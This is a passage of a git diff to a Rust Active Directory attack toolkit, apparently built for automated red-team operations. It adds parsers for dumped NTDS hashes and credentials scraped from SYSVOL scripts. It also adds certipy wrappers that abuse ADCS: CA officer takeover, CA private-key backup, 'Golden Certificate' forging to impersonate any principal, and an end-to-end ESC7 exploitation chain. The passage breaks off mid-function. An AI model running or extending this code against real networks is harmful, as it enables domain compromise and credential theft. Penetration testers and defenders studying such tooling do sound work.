"00299570-246d-11d0-a768-00aa006e0529"); + } + + #[test] + fn base64_decode_simple() { + let decoded = base64_decode("AQAAAA==").unwrap(); + assert_eq!(decoded, vec![0x01, 0x00, 0x00, 0x00]); + } + + #[test] + fn base64_decode_empty() { + let decoded = base64_decode("").unwrap(); + assert!(decoded.is_empty()); + } + + #[test] + fn classify_generic_all() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: GENERIC_ALL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert_eq!(types, vec!["genericall"]); + } + + #[test] + fn classify_full_control() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: FULL_CONTROL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert_eq!(types, vec!["genericall"]); + } + + #[test] + fn classify_write_dacl() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: WRITE_DACL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"writedacl")); + } + + #[test] + fn classify_write_owner() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: WRITE_OWNER, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"writeowner")); + } + + #[test] + fn classify_force_change_password() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: ADS_RIGHT_DS_CONTROL_ACCESS, + object_type_guid: Some(GUID_FORCE_CHANGE_PASSWORD.into()), + }; + let types = classify_ace(&ace); + assert!(types.contains(&"forcechangepassword")); + } + + #[test] + fn classify_self_membership() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: ADS_RIGHT_DS_SELF, + object_type_guid: Some(GUID_SELF_MEMBERSHIP.into()), + }; + let types = classify_ace(&ace); + assert!(types.contains(&"self_membership")); + } + + #[test] + fn classify_generic_write() { + let ace = ParsedAce { + trustee_sid: 
"S-1-5-21-1-2-1001".into(), + access_mask: GENERIC_WRITE, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"genericwrite")); + } + + #[test] + fn classify_no_dangerous_perms() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: 0x00000001, // just read + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.is_empty()); + } + + #[test] + fn parse_security_descriptor_too_short() { + let result = parse_security_descriptor(&[0x01, 0x00]); + assert!(result.is_empty()); + } + + #[test] + fn well_known_sids() { + assert_eq!(well_known_sid("S-1-5-18"), Some("SYSTEM")); + assert_eq!(well_known_sid("S-1-1-0"), Some("Everyone")); + assert_eq!( + well_known_sid("S-1-5-32-544"), + Some("BUILTIN\\Administrators") + ); + assert_eq!(well_known_sid("S-1-5-21-custom"), None); + } + + #[test] + fn parse_acl_enumeration_empty() { + let vulns = parse_acl_enumeration("", &serde_json::json!({"domain": "contoso.local"})); + assert!(vulns.is_empty()); + } + + #[test] + fn parse_security_descriptor_minimal_valid() { + // Construct a minimal self-relative SD with DACL present, 0 ACEs + let mut sd = [0u8; 24]; + sd[0] = 1; // revision + // control: SE_DACL_PRESENT (0x0004) | SE_SELF_RELATIVE (0x8000) + sd[2] = 0x04; + sd[3] = 0x80; + // DACL offset at byte 16 (LE u32) + sd[16] = 20; // DACL starts at offset 20 + // DACL header at offset 20: revision=2, sbz=0, size=8, ace_count=0 + sd[20] = 2; // ACL revision + sd[22] = 8; // ACL size (just header) + sd[24..].iter().for_each(|_| {}); // pad isn't needed, we have exact size + + // Actually need 28 bytes total (20 for SD header + 8 for DACL header) + let mut sd = vec![0u8; 28]; + sd[0] = 1; + sd[2] = 0x04; + sd[3] = 0x80; + sd[16] = 20; + sd[20] = 2; + sd[22] = 8; + // ace_count at offset 24 = 0 + + let result = parse_security_descriptor(&sd); + assert!(result.is_empty()); + } +} diff --git a/ares-tools/src/parsers/secrets.rs 
b/ares-tools/src/parsers/secrets.rs index 4b5f2080..323db87a 100644 --- a/ares-tools/src/parsers/secrets.rs +++ b/ares-tools/src/parsers/secrets.rs @@ -2,6 +2,30 @@ use serde_json::{json, Value}; +/// Strip the `SMB ` framing that `nxc smb` prepends to every +/// line of pass-through output. If the line doesn't have the framing, return it +/// untouched. Needed because `forge_inter_realm_and_dump` shells out to +/// `nxc smb --ntds` instead of `impacket-secretsdump` (the latter's DRSUAPI +/// bind rejects cross-realm Kerberos credentials), so the secretsdump parser +/// has to handle nxc-framed lines too. +fn strip_nxc_framing(line: &str) -> &str { + let trimmed = line.trim_start(); + if !trimmed.starts_with("SMB ") && !trimmed.starts_with("SMB\t") { + return line; + } + // Walk through the first 4 whitespace-delimited tokens (SMB, IP, PORT, HOST) + // and return everything after the 4th token's trailing whitespace. + let mut rest = trimmed; + for _ in 0..4 { + rest = rest.trim_start(); + match rest.find(char::is_whitespace) { + Some(end) => rest = &rest[end..], + None => return line, + } + } + rest.trim_start() +} + pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec) { // Prefer target_domain (the domain being dumped) over domain (auth credential's domain) // to correctly attribute hashes when authenticating cross-domain. 
@@ -14,8 +38,34 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>
+    // First pass: collect AES keys. Lines look like
+    // "DOMAIN\\user:aes256-cts-hmac-sha1-96:<hex>" or
+    // "domain.local/user:aes256-cts-hmac-sha1-96:<hex>"
+    let mut aes_keys: std::collections::HashMap<String, String> = std::collections::HashMap::new();
+    for raw_line in output.lines() {
+        let line = strip_nxc_framing(raw_line).trim();
+        if line.is_empty() || line.starts_with('[') {
+            continue;
+        }
+        if let Some(rest) = line.split_once(":aes256-cts-hmac-sha1-96:") {
+            let raw_user = rest.0;
+            let aes_hex = rest.1.trim();
+            if aes_hex.is_empty() || !aes_hex.chars().all(|c| c.is_ascii_hexdigit()) {
+                continue;
+            }
+            let username = raw_user
+                .rsplit_once(['\\', '/'])
+                .map(|(_, u)| u)
+                .unwrap_or(raw_user)
+                .to_string();
+            aes_keys.insert(username.to_lowercase(), aes_hex.to_lowercase());
+        }
+    }
+
+    for raw_line in output.lines() {
+        let line = strip_nxc_framing(raw_line).trim();
 
         // NTLM hash format: "username:RID:LMhash:NThash:::"
         // or "DOMAIN\username:RID:LMhash:NThash:::"
@@ -23,13 +73,14 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>
         let parts: Vec<&str> = line.split(':').collect();
         if parts.len() >= 4 {
             let raw_user = parts[0];
-            let (user_domain, username) = if raw_user.contains('\\') {
-                let split: Vec<&str> = raw_user.splitn(2, '\\').collect();
-                let netbios = split[0];
-                // Resolve NetBIOS domain prefix to FQDN using target_domain.
-                // e.g. "CONTOSO" → "contoso.local" when target_domain="contoso.local"
-                let resolved = resolve_netbios_to_fqdn(netbios, domain);
-                (resolved, split[1].to_string())
+            let (user_domain, username) = if let Some(idx) = raw_user.find(['\\', '/']) {
+                let prefix = &raw_user[..idx];
+                let user = &raw_user[idx + 1..];
+                // Resolve NetBIOS prefix to FQDN using target_domain.
+                // raiseChild emits "domain.local/user" (slash + FQDN),
+                // standard secretsdump emits "DOMAIN\\user" (backslash + NetBIOS).
+                let resolved = resolve_netbios_to_fqdn(prefix, domain);
+                (resolved, user.to_string())
             } else {
                 (domain.to_string(), raw_user.to_string())
             };
@@ -40,13 +91,17 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>
+    #[test]
+    fn parse_secretsdump_strips_nxc_framing() {
+        // NTDS lines from `nxc smb --ntds` carry the "SMB <ip> <port> <host>" prefix.
+        let output = "\
+SMB 192.168.58.10 445 DC01 [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
+SMB 192.168.58.10 445 DC01 contoso.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
+SMB 192.168.58.10 445 DC01 contoso.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
+SMB 192.168.58.10 445 DC01 [+] Dumped 2 NTDS hashes";
+        let params = json!({"target_domain": "contoso.local"});
+        let (hashes, _) = parse_secretsdump(output, &params);
+        assert_eq!(hashes.len(), 2);
+        assert_eq!(hashes[0]["username"], "krbtgt");
+        assert_eq!(hashes[0]["domain"], "contoso.local");
+        assert!(hashes[0]["hash_value"]
+            .as_str()
+            .unwrap()
+            .contains("11111111111111111111111111111111"));
+        assert_eq!(hashes[1]["username"], "Administrator");
+    }
+
+    #[test]
+    fn parse_secretsdump_strips_nxc_framing_with_aes_keys() {
+        // nxc-framed output should still let AES-key collection work.
+        let output = "\
+SMB 192.168.58.20 445 DC02 FABRIKAM\\CONTOSO$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
+SMB 192.168.58.20 445 DC02 FABRIKAM\\CONTOSO$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444";
+        let params = json!({"target_domain": "fabrikam.local"});
+        let (hashes, _) = parse_secretsdump(output, &params);
+        assert_eq!(hashes.len(), 1);
+        assert_eq!(hashes[0]["username"], "CONTOSO$");
+        assert_eq!(
+            hashes[0]["aes_key"],
+            "4444444444444444444444444444444444444444444444444444444444444444"
+        );
+    }
+}
diff --git a/ares-tools/src/parsers/spider.rs b/ares-tools/src/parsers/spider.rs
index cdca3af4..e7232160 100644
--- a/ares-tools/src/parsers/spider.rs
+++ b/ares-tools/src/parsers/spider.rs
@@ -106,7 +106,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec<Value> {
             .unwrap_or(domain);
         let username = &cap[2];
         let password = &cap[3];
-        if is_plausible_password(password) {
+        if is_plausible_password(password) && is_plausible_username(username) {
             creds.push(json!({
                 "username": username,
                 "password": password,
@@ -120,6 +120,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec<Value> {
     let usernames: Vec<String> = RE_USERNAME
         .captures_iter(content)
         .filter_map(|cap| first_capture(&cap, &[1, 2, 3]))
+        .filter(|u| is_plausible_username(u))
         .collect();
 
     let passwords: Vec<String> = RE_PASSWORD
@@ -157,6 +158,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec<Value> {
     let ps_users: Vec<String> = RE_PS_PARAM_USER
         .captures_iter(content)
         .filter_map(|cap| first_capture(&cap, &[1, 2, 3]))
+        .filter(|u| is_plausible_username(u))
         .collect();
 
     let ps_passes: Vec<String> = RE_PS_PARAM_PASS
@@ -201,7 +203,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec<Value> {
 }
 
 /// Quick check that a value looks like a plausible password (not a variable ref,
-/// not too short, not a common placeholder).
+/// not a PowerShell cmdlet, not too short, not a common placeholder).
 fn is_plausible_password(s: &str) -> bool {
     if s.len() < 2 {
         return false;
     }
@@ -210,6 +212,11 @@ fn is_plausible_password(s: &str) -> bool {
     if s.starts_with('$') || s.starts_with('%') {
         return false;
     }
+    // Skip PowerShell cmdlets (Verb-Noun) like `New-Object`, `Get-Credential`.
+    // Captured when scripts assign cmdlet output to $password without quotes.
+    if PS_CMDLET_RE.is_match(s) {
+        return false;
+    }
     // Skip common placeholders
     let lower = s.to_lowercase();
     !matches!(
@@ -218,6 +225,30 @@ fn is_plausible_password(s: &str) -> bool {
     )
 }
 
+/// Quick check that a value looks like a plausible username (not a variable
+/// reference, property access, or scriptblock fragment).
+fn is_plausible_username(s: &str) -> bool {
+    if s.len() < 2 {
+        return false;
+    }
+    // PowerShell variable / property access: `$x`, `$x.y`, `$env:X`
+    if s.starts_with('$') || s.starts_with('%') {
+        return false;
+    }
+    // Reject anything containing characters that don't appear in real
+    // usernames but DO appear in scriptblock fragments / expressions.
+    if s.chars()
+        .any(|c| matches!(c, '(' | ')' | '{' | '}' | '"' | '\'' | ';' | ' '))
+    {
+        return false;
+    }
+    true
+}
+
+/// PowerShell cmdlet shape: `Verb-Noun` with TitleCase verb and noun.
+static PS_CMDLET_RE: LazyLock<Regex> =
+    LazyLock::new(|| Regex::new(r"^[A-Z][a-zA-Z]+-[A-Z][a-zA-Z]+$").unwrap());
+
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -314,6 +345,29 @@ $pass = "P@ssw0rd"
         assert!(creds.is_empty());
     }
 
+    #[test]
+    fn rejects_powershell_expression_username_and_cmdlet_password() {
+        // Real-world false positive that produced
+        // `contoso.local\$user.username:New-Object` in loot. The username is a
+        // PowerShell property access expression, the "password" is a cmdlet
+        // name (Verb-Noun). Neither is a literal credential.
+        let output = r#"
+--- SYSVOL/scripts/userInfo.ps1 ---
+$user = $User.UserName
+$password = New-Object PSCredential
+"#;
+        let params = json!({"domain": "contoso.local"});
+        let creds = parse_spider_credentials(output, &params);
+        assert!(
+            creds.is_empty(),
+            "expected zero creds, got {:?}",
+            creds
+                .iter()
+                .map(|c| format!("{}:{}", c["username"], c["password"]))
+                .collect::<Vec<_>>()
+        );
+    }
+
     // ── split_domain_user ───────────────────────────────────────
 
     #[test]
diff --git a/ares-tools/src/parsers/trust.rs b/ares-tools/src/parsers/trust.rs
index 8eb523b0..f2e52a9a 100644
--- a/ares-tools/src/parsers/trust.rs
+++ b/ares-tools/src/parsers/trust.rs
@@ -11,8 +11,10 @@ const TRUST_DIRECTION_BIDIRECTIONAL: u32 = 3;
 const TRUST_TYPE_PARENT_CHILD: u32 = 1; // same forest
 const TRUST_TYPE_TREE_ROOT: u32 = 2; // tree root (also intra-forest)
 
-/// LDAP trustAttributes (MS-ADTS 6.1.6.7.9) flag for forest transitive trust.
+/// LDAP trustAttributes (MS-ADTS 6.1.6.7.9) flags.
 const TRUST_ATTR_FOREST_TRANSITIVE: u32 = 0x00000008;
+const TRUST_ATTR_WITHIN_FOREST: u32 = 0x00000020;
+const TRUST_ATTR_QUARANTINED_DOMAIN: u32 = 0x00000004;
 
 /// Parse `enumerate_domain_trusts` ldapsearch output into TrustInfo-compatible JSON values.
 ///
@@ -46,8 +48,15 @@ pub fn parse_domain_trusts(output: &str) -> Vec<Value> {
         let classified_type = classify_trust_type(trust_type, trust_attributes, cn);
 
-        let sid_filtering =
-            trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 || classified_type == "forest";
+        // SID filtering is on by default for both forest and external trusts in
+        // modern AD (Server 2003+). Explicit attribute flags override the default,
+        // but absent the flag we still treat cross-forest/external trusts as
+        // filtered — mirrors `netdom trust /SidFiltering` which defaults to "yes"
+        // and blocks ExtraSid claims with RID < 1000.
+ let sid_filtering = trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 + || trust_attributes & TRUST_ATTR_QUARANTINED_DOMAIN != 0 + || classified_type == "forest" + || classified_type == "external"; Some(json!({ "domain": cn.to_lowercase(), @@ -111,12 +120,27 @@ pub fn parse_domain_trusts(output: &str) -> Vec<Value> { } /// Classify trust type from LDAP trustType and trustAttributes values. +/// +/// trustAttributes is the authoritative signal: +/// - WITHIN_FOREST (0x20) → intra-forest (parent_child or tree_root) +/// - FOREST_TRANSITIVE (0x08) → cross-forest +/// - QUARANTINED_DOMAIN (0x04) → external (with SID filtering) +/// +/// trustType is largely informational in modern AD (almost always 2 = uplevel). +/// Fall back to cn-label heuristics only when attributes are missing. fn classify_trust_type(trust_type: u32, trust_attributes: u32, cn: &str) -> String { - // Forest transitive flag → cross-forest trust + // Authoritative attribute checks first. + if trust_attributes & TRUST_ATTR_WITHIN_FOREST != 0 { + return "parent_child".to_string(); + } if trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 { return "forest".to_string(); } + if trust_attributes & TRUST_ATTR_QUARANTINED_DOMAIN != 0 { + return "external".to_string(); + } + // Fall back to legacy trustType-based heuristics. match trust_type { TRUST_TYPE_PARENT_CHILD => "parent_child".to_string(), TRUST_TYPE_TREE_ROOT => { @@ -221,7 +245,8 @@ flatName: CHILD assert_eq!(trusts.len(), 1); assert_eq!(trusts[0]["direction"], "outbound"); assert_eq!(trusts[0]["trust_type"], "external"); - assert!(!trusts[0]["sid_filtering"].as_bool().unwrap()); + // External trusts have SID filtering on by default in modern AD.
+ assert!(trusts[0]["sid_filtering"].as_bool().unwrap()); } #[test] @@ -250,6 +275,30 @@ flatName: CHILD assert_eq!(trusts[0]["trust_type"], "parent_child"); } + #[test] + fn parse_trust_within_forest_from_child_view() { + // When enumerating from child looking up to parent, cn is short + // ("contoso.local") but trustAttributes has WITHIN_FOREST (0x20). + // The attribute is authoritative and should yield parent_child. + let output = + "cn: contoso.local\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 32\nflatName: CONTOSO\n"; + let trusts = parse_domain_trusts(output); + assert_eq!(trusts.len(), 1); + assert_eq!(trusts[0]["trust_type"], "parent_child"); + assert!(!trusts[0]["sid_filtering"].as_bool().unwrap()); + } + + #[test] + fn parse_trust_quarantined_external() { + // QUARANTINED_DOMAIN (0x04) → external trust with SID filtering. + let output = + "cn: partner.com\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 4\nflatName: PARTNER\n"; + let trusts = parse_domain_trusts(output); + assert_eq!(trusts.len(), 1); + assert_eq!(trusts[0]["trust_type"], "external"); + assert!(trusts[0]["sid_filtering"].as_bool().unwrap()); + } + #[test] fn parse_trust_domain_lowercased() { let output = "cn: FABRIKAM.LOCAL\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 8\nflatName: FABRIKAM\n"; diff --git a/ares-tools/src/privesc/adcs.rs b/ares-tools/src/privesc/adcs.rs index 9e7c358e..1ad94a69 100644 --- a/ares-tools/src/privesc/adcs.rs +++ b/ares-tools/src/privesc/adcs.rs @@ -9,33 +9,41 @@ use crate::ToolOutput; /// Enumerate ADCS certificate templates and CAs using Certipy. 
/// -/// Required args: `username`, `domain`, `password`, `dc_ip` -/// Optional args: `vulnerable` +/// Required args: `username`, `domain`, `dc_ip` +/// Optional args: `password`, `hashes`, `vulnerable` pub async fn certipy_find(args: &Value) -> Result<ToolOutput> { let username = required_str(args, "username")?; let domain = required_str(args, "domain")?; - let password = required_str(args, "password")?; let dc_ip = required_str(args, "dc_ip")?; - let vulnerable = optional_bool(args, "vulnerable").unwrap_or(false); + let vulnerable = optional_bool(args, "vulnerable").unwrap_or(true); + let hashes = optional_str(args, "hashes"); let user_at_domain = format!("{username}@{domain}"); - CommandBuilder::new("certipy") + let mut cmd = CommandBuilder::new("certipy") .arg("find") - .flag("-u", user_at_domain) - .flag("-p", password) + .flag("-u", &user_at_domain) .flag("-dc-ip", dc_ip) .arg("-text") + .arg("-stdout") .arg_if(vulnerable, "-vulnerable") - .timeout_secs(120) - .execute() - .await + .timeout_secs(120); + + if let Some(h) = hashes { + cmd = cmd.flag("-hashes", h); + } else { + let password = required_str(args, "password")?; + cmd = cmd.flag("-p", password); + } + + cmd.execute().await } /// Request a certificate from an ADCS CA using Certipy.
/// /// Required args: `username`, `domain`, `password`, `ca`, `template`, `dc_ip` -/// Optional args: `upn` +/// Optional args: `upn`, `target` (CA server IP/hostname — use when CA is not on the DC), +/// `sid` (SID to embed in cert), `out` (output PFX filename) pub async fn certipy_request(args: &Value) -> Result<ToolOutput> { let username = required_str(args, "username")?; let domain = required_str(args, "domain")?; @@ -44,6 +52,24 @@ pub async fn certipy_request(args: &Value) -> Result<ToolOutput> { let template = required_str(args, "template")?; let dc_ip = required_str(args, "dc_ip")?; let upn = optional_str(args, "upn"); + let sid = optional_str(args, "sid"); + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + let application_policies = optional_str(args, "application_policies"); + + // Generate a unique output filename to avoid certipy's interactive overwrite + // prompt which kills non-interactive runs. Use template + epoch millis. + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + format!("cert_{template}_{ts}") + } + }; let user_at_domain = format!("{username}@{domain}"); @@ -54,7 +80,11 @@ pub async fn certipy_request(args: &Value) -> Result<ToolOutput> { .flag("-ca", ca) .flag("-template", template) .flag("-dc-ip", dc_ip) + .flag("-out", out) + .flag_opt("-target", target) .flag_opt("-upn", upn) + .flag_opt("-sid", sid) + .flag_opt("-application-policies", application_policies) .timeout_secs(120) .execute() .await @@ -68,6 +98,15 @@ pub async fn certipy_auth(args: &Value) -> Result<ToolOutput> { let dc_ip = required_str(args, "dc_ip")?; let domain = required_str(args, "domain")?; + // Certipy auth writes .ccache based on cert subject (e.g. administrator.ccache) + // and does NOT support -out.
Remove existing .ccache files to prevent the + interactive "Overwrite? (y/n)" prompt that kills non-interactive runs. + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + CommandBuilder::new("certipy") .arg("auth") .flag("-pfx", pfx_path) @@ -90,6 +129,27 @@ pub async fn certipy_shadow(args: &Value) -> Result<ToolOutput> { let user_at_domain = format!("{username}@{domain}"); + // Generate unique output name to avoid interactive overwrite prompt + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + format!("shadow_{target}_{ts}") + } + }; + + // certipy shadow auto internally calls certipy auth which writes .ccache + // based on the target account name. Remove existing .ccache to prevent the + // interactive "Overwrite? (y/n)" prompt. + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + CommandBuilder::new("certipy") .arg("shadow") .arg("auto") @@ -97,11 +157,350 @@ .flag("-password", password) .flag("-account", target) .flag("-dc-ip", dc_ip) + .flag("-out", out) .timeout_secs(120) .execute() .await } +/// Certipy CA management operations (add-officer, issue-request, backup). +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca` +/// Required: exactly one of: +/// - `add_officer` (bool, true) +/// - `issue_request` (integer request ID) +/// - `backup` (bool, true) — exports the CA private key to `.pfx` in CWD. +/// Requires SYSTEM-equivalent access on the CA host (e.g., the calling +/// process is running on a host where `username` is local administrator).
+pub async fn certipy_ca(args: &Value) -> Result<ToolOutput> { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + + let user_at_domain = format!("{username}@{domain}"); + + let add_officer = optional_bool(args, "add_officer").unwrap_or(false); + let backup = optional_bool(args, "backup").unwrap_or(false); + let issue_request = args + .get("issue_request") + .and_then(|v| v.as_i64()) + .map(|v| v as i32); + + let mut cmd = CommandBuilder::new("certipy") + .arg("ca") + .flag("-username", user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .timeout_secs(180); + + if add_officer { + cmd = cmd.flag("-add-officer", format!("{username}@{domain}")); + } + if let Some(req_id) = issue_request { + cmd = cmd.flag("-issue-request", req_id.to_string()); + } + if backup { + cmd = cmd.arg("-backup"); + } + + cmd.execute().await +} + +/// Forge a "Golden Certificate" from a stolen CA PFX (the `-backup` output of +/// `certipy_ca`). Produces a client PFX that authenticates as `upn` on the CA's +/// domain — the universal terminal node for ADCS compromise: any path that +/// gets SYSTEM on a CA host can chain `certipy_ca backup` → this tool → +/// `certipy_auth` to obtain a TGT/NT hash for any principal in the domain. +/// +/// Required args: `ca_pfx` (path to stolen CA PFX), `upn` (target principal, +/// e.g.
`administrator@essos.local`) +/// Optional args: `subject`, `template`, `out` (output PFX path) +pub async fn certipy_forge(args: &Value) -> Result<ToolOutput> { + let ca_pfx = required_str(args, "ca_pfx")?; + let upn = required_str(args, "upn")?; + let subject = optional_str(args, "subject"); + let template = optional_str(args, "template"); + + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let safe_upn = upn.replace(['/', '\\', ' '], "_"); + format!("forged_{safe_upn}_{ts}.pfx") + } + }; + + CommandBuilder::new("certipy") + .arg("forge") + .flag("-ca-pfx", ca_pfx) + .flag("-upn", upn) + .flag_opt("-subject", subject) + .flag_opt("-template", template) + .flag("-out", out) + .timeout_secs(60) + .execute() + .await +} + +/// Retrieve a previously issued certificate by request ID. +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca`, +/// `request_id` +/// Optional args: `target` (CA server IP) +pub async fn certipy_retrieve(args: &Value) -> Result<ToolOutput> { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + let request_id = + args.get("request_id") + .and_then(|v| v.as_i64()) + .ok_or_else(|| anyhow::anyhow!("missing required arg: request_id"))?
as i32; + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + + let user_at_domain = format!("{username}@{domain}"); + + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out = format!("cert_retrieve_{request_id}_{ts}"); + + CommandBuilder::new("certipy") + .arg("req") + .flag("-username", user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-retrieve", request_id.to_string()) + .flag("-dc-ip", dc_ip) + .flag("-out", out) + .flag_opt("-target", target) + .timeout_secs(120) + .execute() + .await +} + +/// Run the full ESC7 exploitation chain: add officer → request SubCA cert +/// (gets denied) → issue the pending request → retrieve cert → authenticate. +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca` +/// Optional args: `target` (CA server IP), `upn`, `sid` +pub async fn certipy_esc7_full_chain(args: &Value) -> Result<ToolOutput> { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + let upn = optional_str(args, "upn") + .unwrap_or("administrator") + .to_string(); + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + let sid = optional_str(args, "sid"); + + let upn_full = if upn.contains('@') { + upn.clone() + } else { + format!("{upn}@{domain}") + }; + + let user_at_domain = format!("{username}@{domain}"); + let mut outputs = Vec::new(); + + // Step 1: Add self as CA officer (certipy v5 requires principal as arg) + let mut step1_cmd = CommandBuilder::new("certipy") + .arg("ca") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .flag("-add-officer",
username); + if let Some(t) = &target { + step1_cmd = step1_cmd.flag("-target", *t); + } + let step1 = step1_cmd.timeout_secs(120).execute().await?; + outputs.push(("Add Officer", step1)); + + // Step 2: Request cert with SubCA template (will be denied/pending) + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out_name = format!("cert_esc7_{ts}"); + + let mut req_cmd = CommandBuilder::new("certipy") + .arg("req") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-template", "SubCA") + .flag("-upn", &upn_full) + .flag("-dc-ip", dc_ip) + .flag("-out", &out_name); + if let Some(t) = &target { + req_cmd = req_cmd.flag("-target", *t); + } + if let Some(s) = &sid { + req_cmd = req_cmd.flag("-sid", *s); + } + // Certipy asks "Would you like to save the private key? (y/N)" when the + // SubCA request is denied — we need to answer "y" to keep the key for later. + let step2 = req_cmd.stdin("y\n").timeout_secs(120).execute().await?; + + // Parse the request ID from certipy output (e.g., "Request ID is 42") + let request_id = step2 + .stdout + .lines() + .chain(step2.stderr.lines()) + .find_map(|line| { + let lower = line.to_lowercase(); + if lower.contains("request id") { + line.split_whitespace() + .filter_map(|w| w.trim_end_matches('.').parse::<i32>().ok()) + .next_back() + } else { + None + } + }); + outputs.push(("Request SubCA", step2)); + + let req_id = match request_id { + Some(id) => id, + None => { + let combined = outputs + .iter() + .map(|(name, o)| format!("=== {name} ===\n{}\n{}", o.stdout, o.stderr)) + .collect::<Vec<_>>() + .join("\n"); + return Ok(ToolOutput { + stdout: combined, + stderr: "ERROR: Could not parse request ID from certipy output".into(), + exit_code: Some(1), + success: false, + }); + } + }; + + // Step 3: Issue the pending request using ManageCA rights + let mut step3_cmd = CommandBuilder::new("certipy") + .arg("ca") +
.flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .flag("-issue-request", req_id.to_string()); + if let Some(t) = &target { + step3_cmd = step3_cmd.flag("-target", *t); + } + let step3 = step3_cmd.timeout_secs(120).execute().await?; + outputs.push(("Issue Request", step3)); + + // Step 4: Retrieve the issued certificate + let step4 = CommandBuilder::new("certipy") + .arg("req") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-retrieve", req_id.to_string()) + .flag("-dc-ip", dc_ip) + .flag("-out", &out_name); + let mut step4 = step4; + if let Some(t) = &target { + step4 = step4.flag("-target", *t); + } + let step4_out = step4.timeout_secs(120).execute().await?; + outputs.push(("Retrieve Cert", step4_out)); + + // Step 4b: If certipy couldn't create a PFX (key mismatch), combine manually + let pfx_path = format!("{out_name}.pfx"); + let crt_path = format!("{out_name}.crt"); + let key_path = format!("{out_name}.key"); + if !tokio::fs::try_exists(&pfx_path).await.unwrap_or(false) + && tokio::fs::try_exists(&crt_path).await.unwrap_or(false) + && tokio::fs::try_exists(&key_path).await.unwrap_or(false) + { + let combine = CommandBuilder::new("openssl") + .arg("pkcs12") + .flag("-in", &crt_path) + .flag("-inkey", &key_path) + .arg("-export") + .flag("-out", &pfx_path) + .flag("-passout", "pass:") + 